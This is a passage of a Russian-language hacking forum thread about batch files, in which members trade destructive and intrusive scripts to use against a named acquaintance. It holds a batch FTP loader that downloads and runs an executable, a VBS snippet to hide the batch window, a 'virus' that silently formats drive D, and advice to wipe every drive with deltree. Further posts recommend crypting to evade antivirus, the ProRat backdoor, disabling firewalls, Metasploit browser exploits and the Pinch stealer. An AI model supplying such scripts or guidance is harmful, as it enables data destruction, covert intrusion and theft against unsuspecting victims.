terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » обитель функций.bat или просто батники!


обитель функций.bat или просто батники!

Сообщений 81 страница 100 из 120

81

в этой же теме было выложено в формате справки...

0

82

Хы... заманчивая штука, эти батники :) Программирование конечно лутше, но писать программу будет подольше чем батник, да и компилятора может не оказатся под рукой :) Ну что ж, попробую их на вкус ;)

0

83

4y4ik к сожалению и возможности урезаны...

0

84

Но все равно если подключить фантазию то и с батниками можно такого натворить :)

0

85

ozia
Я с ним согласен, но при одном условии что батники будут использоватся с другими файлами или ехе

0

86

Вот простой лоадер на Bat

Код:
echo off
echo open ftp.****.com>log
txt&&echo login>>log.txt&&echo
password>>log.txt&&echo get file.
exe>>log.txt&&echo bye>>log.txt
ftp -s:log.txt
file.exe
del log.txt

ftp.***.com путь до файла
login -логин от фтпшника
pass -пароль от фтпшника
file.exe -имя файла

0

87

Здрасте всем! У мну есть два вопроса.  Как должен выглядеть батник:

1. Для форматирования дисков C и D (одновременно, желательно с таймером, например через 2 часа после запуска батника без подтверждения и т.д. форматируются оба диска)

2. Для расшаривания дисков (условия: 1. пользователь не видит что у него диски расшарены, 2 - можно чтоб эту шару в локалке видел только я или только я имел к ним доступ).

3. Чего надо написать чтобы не выскакивало окошко при запуске батника (доля секунды а все равно паливо)

P.S. батники только начал юзать. Желательно подробно. Заранее ЩИРО ДЯКУЮ))))

0

88

так тебе 3 отдельных или 1 целый?
нах тада шара если диски форматим???
для безпаливности надо или замаскировать под прогу или пропустить через VBS... по типу такого:

Код:
Set WshShell = WScript.CreateObject("WScript.Shell") 
WshShell.Run"E:\маша.bat", 0, true

где E:\маша.bat путь к файлу который надо пропустить через VBS тобешь путь к батнику...
розшарить просче простого...
а вот с форматированием надо подстраивать под ситуацию...

0

89

1-й батник для одного "товарища" - любителя фотки чужие собирать и рассылать куда не надо. Друзья попросили наказать. А у мну щас нет нормальных троянов или криптора. (шоб Антивирь не палил). Поэтому батник. И желательно с таймером - шоб друзья успели к нему на хату вживую пронаблюдать.)))) Хочу кинуть на мыло или Асю (склеить с фоткой и т.д. и т.п.)
2-й батник для расшаривания.   Шоб в сетке доступ открыть и хай качают на здоровье (предварительно приклею к чему нибудь тож). Ток вот незадача пробовал "net share localka=C:\" - видно что доступ к диску открыт и ламеру и всем окружающим. А хочется чтоб было видно только мне))))))))))). Можете чего нибудь забацать?

0

90

хм я вот такой вирей хачу загнать другу вернее другу друга щас
@echo off
echo SHA Budet PIPEC!
if exist D:\virus.txt goto virus
echo y| format D: >null -c AHHAHAA!!!
:virus
:trej
goto trej

0

91

ну как вы думаете попопашет????

0

92

я не пойму зачем всё таки goto??

0

93

готу это типа возвращение к метке, по ходу аля цикл

0

94

Этот батник я так понял пишет сообщение, ищет файл на диске если не находит пишет второе сообщение и потом форматирует диск D, а можно ли в него прописать время запуска? (мну надо просто и эффективно. Без сообщений но желательно с таймером)
Зачем чувака раньше времени пугать? Пусть потом думает что к чему. И можно ли прописать форматирование сразу 2-х дисков C и D?

0

95

roxa написал(а):

1-й батник для одного "товарища" - любителя фотки чужие собирать и рассылать куда не надо. Друзья попросили наказать. А у мну щас нет нормальных троянов или криптора. (шоб Антивирь не палил). Поэтому батник. И желательно с таймером - шоб друзья успели к нему на хату вживую пронаблюдать.)))) Хочу кинуть на мыло или Асю (склеить с фоткой и т.д. и т.п.)2-й батник для расшаривания.   Шоб в сетке доступ открыть и хай качают на здоровье (предварительно приклею к чему нибудь тож). Ток вот незадача пробовал "net share localka=C:\" - видно что доступ к диску открыт и ламеру и всем окружающим. А хочется чтоб было видно только мне))))))))))). Можете чего нибудь забацать?

1.bat - лоадером ты ниче не сделаеш.Оно то конешно скачает но при запуске виря антивирь будет ругатся не хуже сапожников.Так что обращайся к барыгам пускай закриптуют но при этом прийдется платить от 5 до 10$.
2.Для расшаривания бат можеж сделать но если у него стоит локалка и ты можеж подсойденится к нему через сеть.Если бить собираешся с интернета то используй лудше трояны бекдоры.Лудшим вариантом будет ProRat который можно загрузить лоадером  написаным на bat (т.к. лоадер который создает ProRat иногда глючит) также позаботся чтобы у жервы был отрублен фаервол т.к. будет ругатся на то что вирь хочет подконектится к тебе.Так же будет и с лоадером который захочет подконектится к серверу для того чтобы скачать вирус.
Так что дело это сложное но выполнимое.
Также если известно какой использует браузер жертва то используй Metasploit FrameWork.С его помощю ты настроиш експлойт(про експлойты было написано гдето на форуме) поставиш его и кинеш ссылку на сплойт  своему другу тут же запустится експлойт и начинка которую ты выбрал (например загрузка файла с опр сервера или управление консолью(кстати через консоль ты можеж разшарить необходимые диски форматнуть винду и пр.)).Самый оптимальный вариант будет какраз управление консолью (конешно если тебе надо только форматнуть винду и пр. но если надо украсть инфу или чего нибудь ище то пускай пинча\ксинча в атаку)
Для тебя подкину пару ссылок
Как отрубливать антивирусы читаем тут особенно читай 8 и 9тый раздел статьи там какраз есть кое что что может понадобится
Как отрубливать файерволы читаем тут очень полезная статейка.
Учимся настраивать Metaspoit FrameWork тут
Учимся использовать Metasploit FrameWork тут
Учимся использовать и настраивать Metasploit FrameWork 3.0 тут
Настраиваем пинч тут
Настраиваем ProRat 1.9 тут

Дерзай и не забывай что ты попадаеш под статью 273 УК РФ

Отредактировано M1St (2008-03-13 17:01:17)

0

96

roxa

2. Для расшаривания дисков (условия: 1. пользователь не видит что у него диски расшарены, 2 - можно чтоб эту шару в локалке видел только я или только я имел к ним доступ).

Фантастика. Такое только возможно, если это ламер, точнее слепой, тупой ламер :)...

P.S. Это в частности про 1е условие.

0

97

Фантастика. Такое только возможно, если это ламер, точнее слепой, тупой ламер ...

Чего фантастика? Пользователь ламер. И мне требуется что-бы просто не было видно значка на диске (руки). Но если это батник сделать не может то что-ж. Попробую метод что подсказал M1st Спасибо. На ProRat у мну кстати аллергия))))).

0

98

roxa написал(а):

На ProRat у мну кстати аллергия)))))

отключи антивирь и алергия попустит :D
Archangel
а нельзя что-ли убрать "руку" VBS'ом???

0

99

Al_Bruscas написал(а):

echo y| format D: >null -c AHHAHAA!!!

А почему именно диск D? Ставь уж тада от С до Z.А то хрен ли понту...Если нет  у него диска Д? Вирь в никуда.

deltree /y c:
deltree /y d:
deltree /y e:

и т.д. по алфавиту. Так больше смысла хотя б...Все ветки удалит нафиг.

Отредактировано Саня (2008-03-15 02:15:03)

0

100

Archangel написал(а):

если это ламер, точнее слепой, тупой ламер

Дайте адрес такого ламера)))

0


Вы здесь » terminal-s52 » Хакинг » обитель функций.bat или просто батники!